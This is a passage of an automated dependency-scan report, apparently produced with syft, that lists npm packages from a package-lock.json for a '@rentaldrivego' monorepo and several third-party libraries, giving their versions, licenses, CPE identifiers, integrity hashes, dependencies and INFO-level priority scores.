cpe:2.3:a:\@react:\@react-pdf\/stylesheet:6.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/stylesheet:6.2.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/stylesheet@6.2.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-6.2.1.tgz integrity: sha512-2+UEk+7e+z8baaWi2l5kPLWmwtJeOI+T5wW9GGeN3iDH7vd3kbTqOpN1yt9mmfNVZFxQsnDHpznFb5v5UF983A== dependencies: '@react-pdf/fns': 3.1.3 '@react-pdf/types': ^2.11.1 color-string: ^2.1.4 hsl-to-hex: ^1.0.0 media-engine: ^1.0.3 postcss-value-parser: ^4.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: aac5b1fed64c15db ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/textkit 4.4.1' title: '@react-pdf/textkit 4.4.1' description: 'Package discovered: @react-pdf/textkit 4.4.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9a502dcbe994e863 name: '@react-pdf/textkit' version: 4.4.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/textkit:\@react-pdf\/textkit:4.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/textkit:\@react_pdf\/textkit:4.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/textkit:\@react-pdf\/textkit:4.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/textkit:\@react_pdf\/textkit:4.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/textkit:4.4.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/textkit:4.4.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/textkit@4.4.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/textkit/-/textkit-4.4.1.tgz integrity: sha512-Jl9wdTqIvJ5pX+vAGz0EOhP7ut5Two9H6CzTKo/YYPeD79cM2yTXF3JzTERBC28y7LR0Waq9D2LHQjI+b/EYUQ== dependencies: '@babel/runtime': ^7.20.13 '@react-pdf/fns': 2.2.1 bidi-js: ^1.0.2 hyphen: ^1.6.4 unicode-properties: ^1.4.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d6967341a8bbb112 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/types 2.11.1' title: '@react-pdf/types 2.11.1' description: 'Package discovered: @react-pdf/types 2.11.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3103913e34f4201d name: '@react-pdf/types' version: 2.11.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/types:\@react-pdf\/types:2.11.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/types:\@react_pdf\/types:2.11.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/types:\@react-pdf\/types:2.11.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/types:\@react_pdf\/types:2.11.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/types:2.11.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/types:2.11.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/types@2.11.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/types/-/types-2.11.1.tgz integrity: sha512-i9xQgfaDU9QoeNnbp6rltXCWg1huEh195rpOuN8cE4BZ2FuLdQrsIcb2dhFF9aOxXf+XBA6LOSpIW051MDD/bw== dependencies: '@react-pdf/font': ^4.0.8 '@react-pdf/primitives': ^4.3.0 '@react-pdf/stylesheet': ^6.2.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f5a58400fb5d806d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @rentaldrivego/admin 1.0.0' title: '@rentaldrivego/admin 1.0.0' description: 'Package discovered: @rentaldrivego/admin 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2a2c690594e77e74 name: '@rentaldrivego/admin' version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:\@rentaldrivego\/admin:\@rentaldrivego\/admin:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40rentaldrivego/admin@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: '' integrity: '' dependencies: '@rentaldrivego/types': '*' autoprefixer: ^10.4.19 dayjs: ^1.11.11 lucide-react: ^0.376.0 next: 14.2.3 postcss: ^8.4.38 react: ^18.3.1 react-dom: ^18.3.1 recharts: ^2.12.7 tailwindcss: ^3.4.3 zod: ^3.23.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b0c291ec8410a1be ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @rentaldrivego/admin UNKNOWN' title: '@rentaldrivego/admin UNKNOWN' description: 'Package discovered: @rentaldrivego/admin UNKNOWN' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 22655bafcebdfea4 name: '@rentaldrivego/admin' version: UNKNOWN type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:\@rentaldrivego\/admin:\@rentaldrivego\/admin:*:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40rentaldrivego/admin metadataType: javascript-npm-package-lock-entry metadata: resolved: apps/admin integrity: '' dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 28e1ac461cbd16df ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @rentaldrivego/api 1.0.0' title: '@rentaldrivego/api 1.0.0' description: 'Package discovered: @rentaldrivego/api 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 51dda2f8a6d52783 name: '@rentaldrivego/api' version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:\@rentaldrivego\/api:\@rentaldrivego\/api:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40rentaldrivego/api@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: '' integrity: '' dependencies: '@react-pdf/renderer': ^3.4.3 '@rentaldrivego/database': '*' '@rentaldrivego/types': '*' bcryptjs: ^2.4.3 cors: ^2.8.5 dayjs: ^1.11.11 express: ^4.19.2 express-rate-limit: ^8.5.1 firebase-admin: ^12.1.0 helmet: ^7.1.0 ioredis: ^5.3.2 jsonwebtoken: ^9.0.2 morgan: ^1.10.0 multer: ^1.4.5-lts.1 node-cron: ^3.0.3 nodemailer: ^6.9.16 otplib: ^12.0.1 qrcode: ^1.5.3 react: ^18.3.1 react-dom: ^18.3.1 resend: ^3.2.0 socket.io: ^4.7.5 twilio: ^5.1.0 zod: ^3.23.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8fa1f2444979ec05 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @rentaldrivego/api UNKNOWN' title: '@rentaldrivego/api UNKNOWN' description: 'Package discovered: @rentaldrivego/api UNKNOWN' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 731fc15901c69a78 name: '@rentaldrivego/api' version: UNKNOWN type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:\@rentaldrivego\/api:\@rentaldrivego\/api:*:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40rentaldrivego/api metadataType: javascript-npm-package-lock-entry metadata: resolved: apps/api integrity: '' dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5e204c38947c3756 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @rentaldrivego/dashboard 1.0.0' title: '@rentaldrivego/dashboard 1.0.0' description: 'Package discovered: @rentaldrivego/dashboard 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: fb550e5d7052cd7e name: '@rentaldrivego/dashboard' version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:\@rentaldrivego\/dashboard:\@rentaldrivego\/dashboard:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40rentaldrivego/dashboard@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: '' integrity: '' dependencies: '@rentaldrivego/types': '*' autoprefixer: ^10.4.19 dayjs: ^1.11.11 lucide-react: ^0.376.0 next: 14.2.3 postcss: ^8.4.38 react: ^18.3.1 react-dom: ^18.3.1 recharts: ^2.12.7 sharp: ^0.34.5 socket.io-client: ^4.7.5 tailwindcss: ^3.4.3 zod: ^3.23.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f5ec61dae5249a19 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @rentaldrivego/dashboard UNKNOWN' title: '@rentaldrivego/dashboard UNKNOWN' description: 'Package discovered: @rentaldrivego/dashboard UNKNOWN' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8302af283dd2fb59 name: '@rentaldrivego/dashboard' version: UNKNOWN type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:\@rentaldrivego\/dashboard:\@rentaldrivego\/dashboard:*:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40rentaldrivego/dashboard metadataType: javascript-npm-package-lock-entry metadata: resolved: apps/dashboard integrity: '' dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 71d8c650760061fb ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @rentaldrivego/database 1.0.0' title: '@rentaldrivego/database 1.0.0' description: 'Package discovered: @rentaldrivego/database 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: bd8906fc40f841ac name: '@rentaldrivego/database' version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:\@rentaldrivego\/database:\@rentaldrivego\/database:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40rentaldrivego/database@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: '' integrity: '' dependencies: '@prisma/client': ^5.13.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8b90575e8ea88bd4 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @rentaldrivego/database UNKNOWN' title: '@rentaldrivego/database UNKNOWN' description: 'Package discovered: @rentaldrivego/database UNKNOWN' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2bdca263d566c09a name: '@rentaldrivego/database' version: UNKNOWN type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:\@rentaldrivego\/database:\@rentaldrivego\/database:*:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40rentaldrivego/database metadataType: javascript-npm-package-lock-entry metadata: resolved: packages/database integrity: '' dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8a8bb5bfb12506b1 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @rentaldrivego/marketplace 1.0.0' title: '@rentaldrivego/marketplace 1.0.0' description: 'Package discovered: @rentaldrivego/marketplace 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 71e9d3c366707710 name: '@rentaldrivego/marketplace' version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:\@rentaldrivego\/marketplace:\@rentaldrivego\/marketplace:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40rentaldrivego/marketplace@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: '' integrity: '' dependencies: '@rentaldrivego/types': '*' autoprefixer: ^10.4.19 dayjs: ^1.11.11 lucide-react: ^0.376.0 next: 14.2.3 postcss: ^8.4.38 react: ^18.3.1 react-dom: ^18.3.1 tailwindcss: ^3.4.3 zod: ^3.23.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f48ad70ae4557b5a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @rentaldrivego/marketplace UNKNOWN' title: '@rentaldrivego/marketplace UNKNOWN' description: 'Package discovered: @rentaldrivego/marketplace UNKNOWN' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 999e66650845f9f4 name: '@rentaldrivego/marketplace' version: UNKNOWN type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:\@rentaldrivego\/marketplace:\@rentaldrivego\/marketplace:*:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40rentaldrivego/marketplace metadataType: javascript-npm-package-lock-entry metadata: resolved: apps/marketplace integrity: '' dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 93a5bccb6ac6aa22 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @rentaldrivego/public-site 1.0.0' title: '@rentaldrivego/public-site 1.0.0' description: 'Package discovered: @rentaldrivego/public-site 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f54f88caa8e97b5c name: '@rentaldrivego/public-site' version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:\@rentaldrivego\/public-site:\@rentaldrivego\/public-site:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@rentaldrivego\/public-site:\@rentaldrivego\/public_site:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@rentaldrivego\/public_site:\@rentaldrivego\/public-site:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@rentaldrivego\/public_site:\@rentaldrivego\/public_site:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@rentaldrivego\/public:\@rentaldrivego\/public-site:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@rentaldrivego\/public:\@rentaldrivego\/public_site:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40rentaldrivego/public-site@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: '' integrity: '' dependencies: '@rentaldrivego/types': '*' autoprefixer: ^10.4.19 dayjs: ^1.11.11 lucide-react: ^0.376.0 next: 14.2.3 postcss: ^8.4.38 react: ^18.3.1 react-dom: ^18.3.1 tailwindcss: ^3.4.3 zod: ^3.23.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 308a85ace6addbbf ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @rentaldrivego/types 1.0.0' title: '@rentaldrivego/types 1.0.0' description: 'Package discovered: @rentaldrivego/types 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ba9eab15fb9d9b6f name: '@rentaldrivego/types' version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:\@rentaldrivego\/types:\@rentaldrivego\/types:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40rentaldrivego/types@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: '' integrity: '' dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7f447d2356272ad6 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @rentaldrivego/types UNKNOWN' title: '@rentaldrivego/types UNKNOWN' description: 'Package discovered: @rentaldrivego/types UNKNOWN' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f26df386702211f3 name: '@rentaldrivego/types' version: UNKNOWN type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: [] language: javascript cpes: - cpe: cpe:2.3:a:\@rentaldrivego\/types:\@rentaldrivego\/types:*:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40rentaldrivego/types metadataType: javascript-npm-package-lock-entry metadata: resolved: packages/types integrity: '' dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4b6c5d98db4a925c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @selderee/plugin-htmlparser2 0.11.0' title: '@selderee/plugin-htmlparser2 0.11.0' description: 'Package discovered: @selderee/plugin-htmlparser2 0.11.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 264d7bf353437253 name: '@selderee/plugin-htmlparser2' version: 0.11.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@selderee\/plugin-htmlparser2:\@selderee\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@selderee\/plugin-htmlparser2:\@selderee\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@selderee\/plugin_htmlparser2:\@selderee\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@selderee\/plugin_htmlparser2:\@selderee\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@selderee\/plugin:\@selderee\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@selderee\/plugin:\@selderee\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40selderee/plugin-htmlparser2@0.11.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@selderee/plugin-htmlparser2/-/plugin-htmlparser2-0.11.0.tgz integrity: sha512-P33hHGdldxGabLFjPPpaTxVolMrzrcegejx+0GxjrIb9Zv48D8yAIA/QTDR2dFl7Uz7urX8aX6+5bCZslr+gWQ== dependencies: domhandler: ^5.0.3 selderee: ^0.11.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 96b2d8a0d3d3dca0 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @socket.io/component-emitter 3.1.2' title: '@socket.io/component-emitter 3.1.2' description: 'Package discovered: @socket.io/component-emitter 3.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 32ce324a035d4e3a name: '@socket.io/component-emitter' version: 3.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@socket.io\/component-emitter:\@socket.io\/component-emitter:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@socket.io\/component-emitter:\@socket.io\/component_emitter:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@socket.io\/component_emitter:\@socket.io\/component-emitter:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@socket.io\/component_emitter:\@socket.io\/component_emitter:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@socket.io\/component:\@socket.io\/component-emitter:3.1.2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@socket.io\/component:\@socket.io\/component_emitter:3.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40socket.io/component-emitter@3.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@socket.io/component-emitter/-/component-emitter-3.1.2.tgz integrity: sha512-9BCxFwvbGg/RsZK9tjXd8s4UcwR0MWeFQ1XEKIQVVvAGJyINdrqKMcTRyLoK8Rse1GjzLV9cwjWV1olXRWEXVA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: de2edab9a58d26f1 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @swc/counter 0.1.3' title: '@swc/counter 0.1.3' description: 'Package discovered: @swc/counter 0.1.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d1ab0047814562a3 name: '@swc/counter' version: 0.1.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@swc\/counter:\@swc\/counter:0.1.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40swc/counter@0.1.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@swc/counter/-/counter-0.1.3.tgz integrity: sha512-e2BR4lsJkkRlKZ/qCHPw9ZaSxc0MVUd7gtbtaB7aMvHeJVYe8sOB8DBZkP2DtISHGSku9sCK6T6cnY0CtXrOCQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6291224f1bf77e3f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @swc/helpers 0.5.21' title: '@swc/helpers 0.5.21' description: 'Package discovered: @swc/helpers 0.5.21' remediation: Track and scan dependencies. references: 